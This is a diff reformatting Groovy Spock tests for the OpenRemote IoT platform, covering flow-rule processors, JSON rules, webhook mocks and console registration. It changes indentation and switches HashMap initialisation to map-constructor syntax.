+    rulesetStorageService.merge(ruleset)
 
-        then: "the flow should be deployed"
-        conditions.eventually {
-            assert rulesService.globalEngine.get() != null
-            assert rulesService.globalEngine.get().isRunning()
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == realCollection.name && it.status == DEPLOYED})
-        }
-
-        and: "the flow should be executed correctly"
-        conditions.eventually {
-            def bedroomTargetTemp = assetStorageService.
-                    find(managerTestSetup.apartment1Bedroom1Id).
-                    getAttribute("targetTemperature").flatMap{it.value}.orElse(0d)
-            assert bedroomTargetTemp.intValue() == (startTemperature.intValue() + 10) : ("it was actually " +  bedroomTargetTemp.intValue())//convert to int considering floating point inaccuracy
-        }
-
+    then: "the flow should be deployed"
+    conditions.eventually {
+      assert rulesService.globalEngine.get() != null
+      assert rulesService.globalEngine.get().isRunning()
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == realCollection.name && it.status == DEPLOYED
+      })
     }
 
-    def "Test multi-input processors and DERIVATIVE, INTEGRAL, HISTORIC_VALUE"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class);
-        def timerService = container.getService(TimerService.class);
-
-        when: "An asset is created"
-        def asset = new ShipAsset("Flow ship")
-                .setRealm(Constants.MASTER_REALM)
-                .addOrReplaceAttributes(
-                        new Attribute<Object>(ShipAsset.SPEED, null, timerService.getNow().minus(10, ChronoUnit.HOURS).toEpochMilli()).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("historicOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("sumOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("minOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("avgOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("medOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("maxOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("derOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
-                        new Attribute<Object>("intOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true))
-                )
-        asset = assetStorageService.merge(asset);
-
-        and: "Some datapoints are added to the living room"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), 30D, timerService.getNow().minus(30, ChronoUnit.MINUTES).toEpochMilli()));
-        sleep(100)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), 20D, timerService.getNow().minus(20, ChronoUnit.MINUTES).toEpochMilli()));
-        sleep(100)
-        def previousTime = timerService.getNow().minus(10, ChronoUnit.MINUTES);
-        def previousValue = 10D
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), previousValue, previousTime.toEpochMilli()));
-        sleep(100)
-
-        def currentTime = timerService.getNow();
-        def currentValue = 1D;
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), currentValue, currentTime.toEpochMilli()));
-        sleep(100)
-
-        then: "They are queryable"
-        conditions.eventually {
-            def dps = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), ShipAsset.SPEED.name));
-            assert dps.size() == 4
-        }
-
-        when: "The flow rule is added"
-        String json = getClass().getResource("/org/openremote/test/rules/HistoricAndMultiInputProcessorTest.flow").text
-        json = json.replaceAll("%ASSETID%", asset.getId())
-        json = json.replaceAll("%HISTORIC_ATTRIBUTE%", ShipAsset.SPEED.name)
-        json = json.replaceAll("%HISTORIC_VALUE_OUTPUT%", "historicOutput")
-        json = json.replaceAll("%SUM_OUTPUT%", "sumOutput")
-        json = json.replaceAll("%MIN_OUTPUT%", "minOutput")
-        json = json.replaceAll("%AVG_OUTPUT%", "avgOutput")
-        json = json.replaceAll("%MED_OUTPUT%", "medOutput")
-        json = json.replaceAll("%MAX_OUTPUT%", "maxOutput")
-        json = json.replaceAll("%DER_OUTPUT%", "derOutput")
-        json = json.replaceAll("%INT_OUTPUT%", "intOutput")
-
-        def ruleset = (new GlobalRuleset(
-                "HistoricValueAndProcessorsTest",
-                Ruleset.Lang.FLOW,
-                json
-        ))
-        rulesetStorageService.merge(ruleset)
-
-        and: "the integral and derivative values are calculated"
-        def derivative = (currentValue - previousValue) / (((currentTime.toEpochMilli() - previousTime.toEpochMilli())/1000.0))
-        def integral = ((currentValue + previousValue) * ((currentTime.toEpochMilli() - previousTime.toEpochMilli())/1000.0)) / 2
-
-        then: "The rule compiles successfully"
-        conditions.eventually {
-            assert rulesService.globalEngine.get() != null
-            assert rulesService.globalEngine.get().isRunning()
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "HistoricValueAndProcessorsTest" && it.status == DEPLOYED})
-        }
-
-        and: "The rule runs and the various attributes are updated accordingly"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), ShipAsset.class);
-            def currentValueSpeed = asset.getAttribute(ShipAsset.SPEED).get().getValue().get()
-            assert asset.getAttribute("historicOutput").get().getValue().get() == 20
-            assert asset.getAttribute("sumOutput").get().getValue().get() == 10
-            assert asset.getAttribute("minOutput").get().getValue().get() == 1
-            assert asset.getAttribute("avgOutput").get().getValue().get() == 2.5
-            assert asset.getAttribute("medOutput").get().getValue().get() == 2.5
-            assert asset.getAttribute("maxOutput").get().getValue().get() == 4
-            assert asset.getAttribute("derOutput").get().getValue().get() == derivative
-            assert asset.getAttribute("intOutput").get().getValue().get() == integral
-        }
+    and: "the flow should be executed correctly"
+    conditions.eventually {
+      def bedroomTargetTemp = assetStorageService.
+      find(managerTestSetup.apartment1Bedroom1Id).
+      getAttribute("targetTemperature").flatMap{it.value}.orElse(0d)
+      assert bedroomTargetTemp.intValue() == (startTemperature.intValue() + 10) : ("it was actually " + bedroomTargetTemp.intValue())//convert to int considering floating point inaccuracy
     }
+  }
+
+  def "Test multi-input processors and DERIVATIVE, INTEGRAL, HISTORIC_VALUE"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    def timerService = container.getService(TimerService.class)
+
+    when: "An asset is created"
+    def asset = new ShipAsset("Flow ship")
+            .setRealm(Constants.MASTER_REALM)
+            .addOrReplaceAttributes(
+            new Attribute<Object>(ShipAsset.SPEED, null, timerService.getNow().minus(10, ChronoUnit.HOURS).toEpochMilli()).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("historicOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("sumOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("minOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("avgOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("medOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("maxOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("derOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true)),
+            new Attribute<Object>("intOutput", null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS, true),new MetaItem<>(MetaItemType.RULE_STATE, true))
+            )
+    asset = assetStorageService.merge(asset)
+
+    and: "Some datapoints are added to the living room"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), 30D, timerService.getNow().minus(30, ChronoUnit.MINUTES).toEpochMilli()))
+    sleep(100)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), 20D, timerService.getNow().minus(20, ChronoUnit.MINUTES).toEpochMilli()))
+    sleep(100)
+    def previousTime = timerService.getNow().minus(10, ChronoUnit.MINUTES)
+    def previousValue = 10D
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), previousValue, previousTime.toEpochMilli()))
+    sleep(100)
+
+    def currentTime = timerService.getNow()
+    def currentValue = 1D
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(new AttributeRef(asset.getId(), ShipAsset.SPEED.name), currentValue, currentTime.toEpochMilli()))
+    sleep(100)
+
+    then: "They are queryable"
+    conditions.eventually {
+      def dps = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), ShipAsset.SPEED.name))
+      assert dps.size() == 4
+    }
+
+    when: "The flow rule is added"
+    String json = getClass().getResource("/org/openremote/test/rules/HistoricAndMultiInputProcessorTest.flow").text
+    json = json.replaceAll("%ASSETID%", asset.getId())
+    json = json.replaceAll("%HISTORIC_ATTRIBUTE%", ShipAsset.SPEED.name)
+    json = json.replaceAll("%HISTORIC_VALUE_OUTPUT%", "historicOutput")
+    json = json.replaceAll("%SUM_OUTPUT%", "sumOutput")
+    json = json.replaceAll("%MIN_OUTPUT%", "minOutput")
+    json = json.replaceAll("%AVG_OUTPUT%", "avgOutput")
+    json = json.replaceAll("%MED_OUTPUT%", "medOutput")
+    json = json.replaceAll("%MAX_OUTPUT%", "maxOutput")
+    json = json.replaceAll("%DER_OUTPUT%", "derOutput")
+    json = json.replaceAll("%INT_OUTPUT%", "intOutput")
+
+    def ruleset = (new GlobalRuleset(
+                    "HistoricValueAndProcessorsTest",
+                    Ruleset.Lang.FLOW,
+                    json
+                    ))
+    rulesetStorageService.merge(ruleset)
+
+    and: "the integral and derivative values are calculated"
+    def derivative = (currentValue - previousValue) / (((currentTime.toEpochMilli() - previousTime.toEpochMilli())/1000.0))
+    def integral = ((currentValue + previousValue) * ((currentTime.toEpochMilli() - previousTime.toEpochMilli())/1000.0)) / 2
+
+    then: "The rule compiles successfully"
+    conditions.eventually {
+      assert rulesService.globalEngine.get() != null
+      assert rulesService.globalEngine.get().isRunning()
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "HistoricValueAndProcessorsTest" && it.status == DEPLOYED
+      })
+    }
+
+    and: "The rule runs and the various attributes are updated accordingly"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), ShipAsset.class)
+      def currentValueSpeed = asset.getAttribute(ShipAsset.SPEED).get().getValue().get()
+      assert asset.getAttribute("historicOutput").get().getValue().get() == 20
+      assert asset.getAttribute("sumOutput").get().getValue().get() == 10
+      assert asset.getAttribute("minOutput").get().getValue().get() == 1
+      assert asset.getAttribute("avgOutput").get().getValue().get() == 2.5
+      assert asset.getAttribute("medOutput").get().getValue().get() == 2.5
+      assert asset.getAttribute("maxOutput").get().getValue().get() == 4
+      assert asset.getAttribute("derOutput").get().getValue().get() == derivative
+      assert asset.getAttribute("intOutput").get().getValue().get() == integral
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/residence/JsonRulesTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/JsonRulesTest.groovy
@@ -243,9 +243,8 @@ class JsonRulesTest extends Specification implements ManagerContainerTrait {
                 "Test Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -253,8 +252,8 @@ class JsonRulesTest extends Specification implements ManagerContainerTrait {
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -262,9 +261,8 @@ class JsonRulesTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                                 (Map<String, Object>)(parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                                )))
-                    }
-                },
+                                ))
+                ),
                 "",
                 ["manager"] as String[])
         consoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
@@ -275,9 +273,8 @@ class JsonRulesTest extends Specification implements ManagerContainerTrait {
                 "Test Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -285,8 +282,8 @@ class JsonRulesTest extends Specification implements ManagerContainerTrait {
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -294,9 +291,8 @@ class JsonRulesTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                                 (Map<String, Object>)(parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                                )))
-                    }
-                },
+                                ))
+                ),
                 "",
                 ["manager"] as String[])
         consoleRegistration2 = authenticatedConsoleResource2.register(null, consoleRegistration2)

--- a/test/src/test/groovy/org/openremote/test/rules/residence/JsonRulesTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/JsonRulesTest.groovy
@@ -85,1718 +85,1782 @@ import static org.openremote.setup.integration.ManagerTestSetup.DEMO_RULE_STATES
 
 class JsonRulesTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    def mockServer = new ClientRequestFilter() {
-        boolean finished = false
-        private int successCount = 0
-        private int failureCount = 0
+  @Shared
+  def mockServer = new ClientRequestFilter() {
+    boolean finished = false
+    private int successCount = 0
+    private int failureCount = 0
 
-        @Override
-        void filter(ClientRequestContext requestContext) throws IOException {
-            if (finished) {
-                return
-            }
-            def requestUri = requestContext.uri
-            def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
+    @Override
+    void filter(ClientRequestContext requestContext) throws IOException {
+      if (finished) {
+        return
+      }
+      def requestUri = requestContext.uri
+      def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
 
-            switch (requestPath) {
-                case "https://basicserver/webhookplain":
-                    if (requestContext.method == "POST" && requestContext.mediaType == MediaType.TEXT_PLAIN_TYPE && requestContext.hasEntity() && requestContext.entity == "test-value") {
-                        successCount++
-                        requestContext.abortWith(Response.ok().build()); return
-                    }
-                    break
-                case "https://basicserver/webhookjson":
-                    if (requestContext.method == "POST" && requestContext.mediaType == MediaType.APPLICATION_JSON_TYPE && requestContext.getHeaderString('test-header') == "test-value" && requestContext.hasEntity()) {
-                        def jsonBody = parse(requestContext.entity.toString()).get() as Map
-                        if (jsonBody.size() == 1
-                                && ((Map)((Object[])jsonBody.values()[0])[0]).get("assetName") == "TestThing"
-                                && ((Map)((Object[])jsonBody.values()[0])[0]).get("value") == "test_message") {
-                            successCount++
-                            requestContext.abortWith(Response.ok().build()); return
-                        }
-                    }
-                    break
+      switch (requestPath) {
+        case "https://basicserver/webhookplain":
+          if (requestContext.method == "POST" && requestContext.mediaType == MediaType.TEXT_PLAIN_TYPE && requestContext.hasEntity() && requestContext.entity == "test-value") {
+            successCount++
+            requestContext.abortWith(Response.ok().build()); return
+          }
+          break
+        case "https://basicserver/webhookjson":
+          if (requestContext.method == "POST" && requestContext.mediaType == MediaType.APPLICATION_JSON_TYPE && requestContext.getHeaderString('test-header') == "test-value" && requestContext.hasEntity()) {
+            def jsonBody = parse(requestContext.entity.toString()).get() as Map
+            if (jsonBody.size() == 1
+                    && ((Map)((Object[])jsonBody.values()[0])[0]).get("assetName") == "TestThing"
+                    && ((Map)((Object[])jsonBody.values()[0])[0]).get("value") == "test_message") {
+              successCount++
+              requestContext.abortWith(Response.ok().build()); return
             }
-            failureCount++
-            requestContext.abortWith(Response.serverError().build())
-        }
+          }
+          break
+      }
+      failureCount++
+      requestContext.abortWith(Response.serverError().build())
+    }
+  }
+
+  def "Turn all lights off when console exits the residence geofence"() {
+
+    List<Tuple2<Notification.Target, PushNotificationMessage>> pushTargetsAndMessages = new CopyOnWriteArrayList<>()
+    List<jakarta.mail.Message> emailMessages = new CopyOnWriteArrayList<>()
+    List<Notification.Target> emailTargets = new CopyOnWriteArrayList<>()
+    List<LocalizedNotificationMessage> localizedMessages = new CopyOnWriteArrayList<>()
+
+    given: "the geofence notifier debounce is set to a small value for testing"
+    Integer originalDebounceMillis = ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS
+    ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS = 100
+
+    and: "the container environment is started with the mock handler"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def pushNotificationHandler = container.getService(PushNotificationHandler.class)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    def localizedNotificationHandler = container.getService(LocalizedNotificationHandler.class)
+    def notificationService = container.getService(NotificationService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def timerService = container.getService(TimerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    RulesEngine realmBuildingEngine
+
+    and: "a mock push notification handler"
+    PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      pushTargetsAndMessages << new Tuple2<>(target, message)
+      callRealMethod()
+    }
+    // Assume sent to FCM
+    mockPushNotificationHandler.sendMessage(_ as Message) >> { message ->
+      return NotificationSendResult.success()
+    }
+    notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
+
+    and: "a mock email notification handler"
+    EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
+    mockEmailNotificationHandler.isValid() >> true
+    mockEmailNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      emailTargets << target
+      callRealMethod()
     }
 
-    def "Turn all lights off when console exits the residence geofence"() {
+    // Assume sent to server
+    mockEmailNotificationHandler.sendMessage(_ as jakarta.mail.Message) >> { email ->
+      emailMessages << email.get(0)
+      return NotificationSendResult.success()
+    }
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
 
-        List<Tuple2<Notification.Target, PushNotificationMessage>> pushTargetsAndMessages = new CopyOnWriteArrayList<>()
-        List<jakarta.mail.Message> emailMessages = new CopyOnWriteArrayList<>()
-        List<Notification.Target> emailTargets = new CopyOnWriteArrayList<>()
-        List<LocalizedNotificationMessage> localizedMessages = new CopyOnWriteArrayList<>()
+    // Register localized handler
+    LocalizedNotificationHandler mockLocalizedNotificationHandler = Spy(localizedNotificationHandler)
+    mockLocalizedNotificationHandler.isValid() >> true
+    mockLocalizedNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      localizedMessages << message
+    }
+    mockLocalizedNotificationHandler.notificationHandlerMap = notificationService.notificationHandlerMap
+    notificationService.notificationHandlerMap.put(localizedNotificationHandler.getTypeName(), mockLocalizedNotificationHandler)
 
-        given: "the geofence notifier debounce is set to a small value for testing"
-        Integer originalDebounceMillis = ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS
-        ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS = 100
+    and: "some rules"
+    Ruleset ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Demo Apartment - All Lights Off",
+            Ruleset.Lang.JSON,
+            getClass().getResource("/org/openremote/test/rules/BasicJsonRules.json").text)
+    ruleset = rulesetStorageService.merge(ruleset)
 
-        and: "the container environment is started with the mock handler"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def pushNotificationHandler = container.getService(PushNotificationHandler.class)
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        def localizedNotificationHandler = container.getService(LocalizedNotificationHandler.class)
-        def notificationService = container.getService(NotificationService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def timerService = container.getService(TimerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        RulesEngine realmBuildingEngine
+    expect: "the rule engines to become available and be running with asset states inserted and no longer tracking location rules"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assert realmBuildingEngine.lastFireTimestamp> 0
+      assert !realmBuildingEngine.trackLocationPredicates
+    }
 
-        and: "a mock push notification handler"
-        PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                pushTargetsAndMessages << new Tuple2<>(target, message)
-                callRealMethod()
-        }
-        // Assume sent to FCM
-        mockPushNotificationHandler.sendMessage(_ as Message) >> {
-            message -> return NotificationSendResult.success()
-        }
-        notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
+    and: "the room lights in an apartment to be on"
+    conditions.eventually {
+      def livingroomAsset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
+      assert livingroomAsset.getAttribute("lightSwitch").get().value.get()
+      assert livingroomAsset.getAttribute("lightSwitchTriggerTimes").get().value.get().length == 2
+      assert livingroomAsset.getAttribute("plantsWaterLevels").get().getValue(Map.class).get().get("cactus") == 0.8d
+      def bathRoomAsset = assetStorageService.find(managerTestSetup.apartment2BathroomId, true)
+      assert bathRoomAsset.getAttribute("lightSwitch").get().value.get()
+    }
 
-        and: "a mock email notification handler"
-        EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
-        mockEmailNotificationHandler.isValid() >> true
-        mockEmailNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                emailTargets << target
-                callRealMethod()
-        }
+    when: "a user authenticates"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
 
-        // Assume sent to server
-        mockEmailNotificationHandler.sendMessage(_ as jakarta.mail.Message) >> {
-            email ->
-                emailMessages << email.get(0)
-                return NotificationSendResult.success()
-        }
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
+    and: "another user authenticates"
+    def accessToken2 = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "building",
+            "building"
+            )
 
-        // Register localized handler
-        LocalizedNotificationHandler mockLocalizedNotificationHandler = Spy(localizedNotificationHandler)
-        mockLocalizedNotificationHandler.isValid() >> true
-        mockLocalizedNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                localizedMessages << message
-        }
-        mockLocalizedNotificationHandler.notificationHandlerMap = notificationService.notificationHandlerMap
-        notificationService.notificationHandlerMap.put(localizedNotificationHandler.getTypeName(), mockLocalizedNotificationHandler)
+    and: "a console is registered by the first user"
+    def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(ConsoleResource.class)
+    def consoleRegistration = new ConsoleRegistration(null,
+            "Test Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            (Map<String, Object>)(parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
+                            ))
+                    ),
+            "",
+            ["manager"] as String[])
+    consoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
 
-        and: "some rules"
-        Ruleset ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Demo Apartment - All Lights Off",
-                Ruleset.Lang.JSON,
-                getClass().getResource("/org/openremote/test/rules/BasicJsonRules.json").text)
-        ruleset = rulesetStorageService.merge(ruleset)
+    and: "a console is registered by the second user"
+    def authenticatedConsoleResource2 = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken2).proxy(ConsoleResource.class)
+    def consoleRegistration2 = new ConsoleRegistration(null,
+            "Test Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            (Map<String, Object>)(parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
+                            ))
+                    ),
+            "",
+            ["manager"] as String[])
+    consoleRegistration2 = authenticatedConsoleResource2.register(null, consoleRegistration2)
 
-        expect: "the rule engines to become available and be running with asset states inserted and no longer tracking location rules"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assert realmBuildingEngine.lastFireTimestamp > 0
-            assert !realmBuildingEngine.trackLocationPredicates
-        }
+    and: "the console attributes are marked as RULE_STATE (inc LOCATION which is needed to trigger the rule)"
+    def asset = assetStorageService.find(consoleRegistration.id)
+    asset.getAttribute(Asset.LOCATION).ifPresent {
+      it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }
+    asset.getAttribute(ConsoleAsset.CONSOLE_NAME).ifPresent {
+      it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }
+    asset.getAttribute(ConsoleAsset.CONSOLE_VERSION).ifPresent {
+      it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }
+    asset = assetStorageService.merge(asset)
 
-        and: "the room lights in an apartment to be on"
-        conditions.eventually {
-            def livingroomAsset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
-            assert livingroomAsset.getAttribute("lightSwitch").get().value.get()
-            assert livingroomAsset.getAttribute("lightSwitchTriggerTimes").get().value.get().length == 2
-            assert livingroomAsset.getAttribute("plantsWaterLevels").get().getValue(Map.class).get().get("cactus") == 0.8d
-            def bathRoomAsset = assetStorageService.find(managerTestSetup.apartment2BathroomId, true)
